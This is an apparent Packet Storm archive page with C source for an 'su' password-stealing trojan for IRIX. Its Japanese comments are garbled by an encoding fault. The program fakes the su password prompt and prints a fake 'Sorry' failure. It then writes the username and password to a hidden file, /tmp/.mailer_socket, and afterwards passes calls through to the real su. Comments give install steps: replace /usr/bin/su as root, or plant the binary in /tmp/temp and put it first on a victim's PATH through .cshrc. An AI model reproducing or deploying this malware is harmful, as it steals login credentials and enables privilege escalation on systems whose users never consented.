SU trojan for IRIX. This trojan logs the passwords. If you install the su trojan correctry, local users or admin fails the first "su", and the password which is inputed to su trojan has been logged to the specified file.
eed0677f1799609c5205e1dd1d4a0a5d/*------------------------------------------------------------
SU¥È¥í¥¤ - sut Ver 1.00
Programmed by £Õ£Î£Ù£Õ£Î
------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
/* °Ê²¼¤Î¥Ñ¥é¥á¡¼¥¿¤ÏOS¤´¤È¤ËÊѹ¹¤¹¤ëɬÍפ¬¤¢¤ê¤Þ¤¹
[ÀßÄê¼ê½ç]
%su
Password: <---- ¤³¤Îʸ»ú¤òMSG_INP¤ËÀßÄꤹ¤ë
su: Sorry <---- Password¤ò¤ï¤¶¤È´Ö°ã¤¨¤ë¡£¤³¤Îʸ»ú¤òMSG_ERR
¤ËÀßÄꤹ¤ë¡£¤³¤Îɽ¼¨¤¬½Ð¤ë¤Þ¤Ç¤Î»þ´Ö(ÉÃ)¤ò
MSG_WAIT¤ËÀßÄꤹ¤ë
%su hohoho <---- /etc/passwd¤Ë¤Ê¤¤¥¢¥«¥¦¥ó¥È̾¤Ësu¤¹¤ë
su Unknown id: hohoho <---- User̾¤¬¤Ê¤¤¤È¤¤¤¦¥¨¥é¡¼¤¬É½¼¨¤µ¤ì¤ë
¤³¤Îʸ»ú¤òMSG_NOID¤ËÀßÄꤹ¤ë
*/
#define MSG_INP "¥Ñ¥¹¥ï¡¼¥É: "
#define MSG_ERR "»ÄÇ°¤Ç¤¹"
#define MSG_NOID "¥æ¡¼¥¶£É£Ä¤ÏÄêµÁ¤µ¤ì¤Æ¤¤¤Þ¤»¤ó: "
#define MSG_WAIT 0
/* °Ê²¼¤Î¥Ñ¥é¥á¡¼¥¿¤ÏOS¤´¤È¡¢¤¢¤ë¤¤¤ÏÀßÄê¤Ë¤è¤Ã¤Æ
Êѹ¹¤¹¤ëɬÍפ¬¤¢¤ê¤Þ¤¹
[ÀßÄê¼ê½ç]
case 1. root¤ò¥Ï¥Ã¥¯¤Ç¤¤¿¾ì¹ç
#which su
/usr/bin/su <--- ËÜʪ¤Îsu¤¬É½¼¨¤µ¤ì¤ë
#mv /usr/bin/su /usr/local/sbin/mule <--- ŬÅö¤Ê̾Á°¤Ç¥³¥Ô¡¼
#cc ./sut.c <--- su¥È¥í¥¤¤ò¥³¥ó¥Ñ¥¤¥ë
#mv ./a.out /usr/bin/su <--- ËÜʪ¤Îsu¤ÈÆþ¤ìÂؤ¨
¤³¤Î¤è¤¦¤ËÀßÄꤷ¤¿¾ì¹ç¤Ï¡¢
REAL_SU¤Ï¡¢
#define REAL_SU "/usr/local/sbin/mule"¤È¤·¤Æ¤¯¤À¤µ¤¤¡£
case 2. °ìÈÌuser¤Î¥¢¥«¥¦¥ó¥È¤Ç»Å¹þ¤à¾ì¹ç
%which su
/usr/bin/su <--- ËÜʪ¤Îsu¤¬É½¼¨¤µ¤ì¤ë¡£¤³¤Îpath¤òREAL_SU¤Ë»ØÄꤹ¤ë
%cc sut.c -o su <--- su¥È¥í¥¤¤ò¥³¥ó¥Ñ¥¤¥ë
%mv su /tmp/temp/ <--- ¥Ð¥ì¤Ë¤¯¤¤½ê¤Ë¥³¥Ô¡¼
%cd ~ <--- »Å¹þ¤àuser¤Îhome¥Ç¥£¥ì¥¯¥È¥ê
%vi .cshrc
.chsrc¤Ïshell¤Î´Ä¶ÀßÄê¤Ç¤¹¡£path¤ò»ØÄꤷ¤ÆÄ̾ï¤Îsu¤è¤ê¥È¥í¥¤¤Îsu
¤òÍ¥À褵¤»¤Þ¤¹¡£.cshrc¥Õ¥¡¥¤¥ë¤Ç¡¢
set path=¤¬¤¢¤ì¤Ð¡¢
set path=(. /tmp/temp /usr/bin ¡¦¡¦¡¦¸å¾Êά
¤Î¤è¤¦¤Ë¤·¤Æ¤ª¤¤Þ¤¹¡£
set path¤¬Ìµ¤¤¾ì¹ç¤Ï¡¢
set path=(. /tmp/temp)
¤È¤¤¤¦¹Ô¤òÆþ¤ì¤Þ¤·¤ç¤¦¡£
*/
#define REAL_SU "/usr/bin/su"
/* ¥í¥°¥Õ¥¡¥¤¥ë¡£¸«¤Ä¤«¤ê¤Ë¤¯¤¤Ì¾Á°¤ËÊѹ¹¤·¤Þ¤·¤ç¤¦
*/
#define LOGFILE "/tmp/.mailer_socket"
/* ÆâÉôÄê¿ô
*/
#define MAX_USERNAME 200
#define MAX_PASSWD 200
main(int argc,char *argv[])
{
char *x;
struct passwd *pwd;
char user[MAX_USERNAME];
char passwd[MAX_PASSWD];
char temp1[MAX_USERNAME],temp2[MAX_PASSWD];
FILE *fp;
int flag=0;
int uid=getuid();
if (argc==1) strcpy(user,"root");
else strcpy(user,argv[1]);
/* su-password¥í¥°¤ò»²¾È¤·¤Æ¡¢°ÊÁ°¤ËGet¤·¤Æ¤¤¤ì¤Ð
Ä̾ï¤Îsu¤ò¸Æ¤Ó½Ð¤¹
*/
if ((fp=fopen(LOGFILE,"r"))!=NULL){
for (;;){
if (feof(fp)) break;
fscanf(fp,"%s",temp1);
fscanf(fp,"%s",temp2);
if (strcmp(user,temp1)==0){
flag=1;
break;
}
}
fclose(fp);
}
pwd=getpwuid(uid);
if (flag==1 || uid==0 || strcmp(pwd->pw_name,user)==0){
sprintf(temp1,"%s %s",REAL_SU,user);
system(temp1);
exit(1);
}
/* User̾¤¬ÉÔÀµ¤Ê¾ì¹ç¤Î½èÍý
*/
if (argc>1){
if ((pwd=getpwnam(user))==NULL){
sleep(MSG_WAIT);
printf("%s%s\n",MSG_NOID,user);
exit(1);
}
}
/* Password¤òÆþÎϤµ¤»¤ë
*/
x=getpass(MSG_INP);
sleep(MSG_WAIT);
/* ¥¨¥é¡¼¤òɽ¼¨¤·¤Æ¡¢¥í¥°¤ë
*/
printf("%s\n",MSG_ERR);
if ((fp=fopen(LOGFILE,"a"))!=NULL){
fprintf(fp,"%s\t%s\n",user,x);
fclose(fp);
}
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!